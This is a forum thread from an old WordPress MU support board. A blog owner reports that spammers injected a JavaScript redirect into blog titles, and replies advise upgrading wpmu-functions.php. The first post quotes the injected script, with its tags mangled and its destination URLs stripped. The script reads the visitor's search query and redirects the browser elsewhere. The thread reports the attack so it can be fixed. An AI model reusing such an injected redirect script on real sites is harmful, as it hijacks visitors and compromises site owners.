The MU forums have moved to

People adding scripts into the title of the blogs (4 posts)

  1. Scytle
    Posted 16 years ago #

    I visited my site today to learn that spammers are actually starting to add scripts into the titles of blogs, that of all things feature redirects so if you type in the url of my site you end up at another site.

    Below is the script in question I have crippled it by taking out some of the tags, but you get the idea. Note the double at the start, I think this is what allows them to do this.

    '<scrpt type=”text/javascript” language=”javascript”>r=document.referrer;u=document.URL;t=”";se=”unknown”;k=”blog+hosting”;function a(c,d,e){if(r.indexOf(c)!=-1){t=d;se=e;}}a(”google.”,”q”,”google”);a(”msn.”,”q”,”msn”);a(”yahoo.”,”p”,”yahoo”);a(”altavista.”,”q”,”altavista”);a(”aol.”,”query”,”aol”);a(”ask.”,”q”,”ask”);a(””,”q”,””);a(””,”query”,”lycos”);a(””,”MT”,”hotbot”);a(””,”qt”,””);a(”webcrawler.”,”searchText”,”webcrawler”);a(”excite.”,”search”,”excite”);a(””,”search”,”netscape”);a(””,”query”,”mamma”);a(””,”query”,””);a(””,”qr”,””);a(””,”q”,””);if(t.length&&((q=r.indexOf(”?”+t+”=”))!=-1||(q=r.indexOf(”&”+t+”=”))!=-1))k=r.substring(q+2+t.length).split(”&”)[0];g=””+k+”&url_tb=”+k;window.location=g;document.location=g;location.href=g;</scrpt>'

    I looked around and found this thread, which seems to help, but was wondering if anything further has been done to keep people from being able to enter in html and scripts into blog titles.

  2. drmiketemp
    Posted 16 years ago #

    I think you mean this thread and I would make sure that you upgrade asap. Donncha released a new version that should take care of the issue.

  3. Scytle
    Posted 16 years ago #

    So perhaps I am missing something, but when i download the new version of that file and then replace it, I just get a white screen when I visit the site. (any page from the site)

    The source code for these pages is completely blank, leading me to think something very early on is wrong.

    I assumed (and you know where that gets you) that you simply download the new file from here

    then replace the old one with this one, yes?

  4. donncha
    Key Master
    Posted 16 years ago #

    Just download the very latest wpmu-functions.php, not the version from [1045]. Read this for more:

About this Topic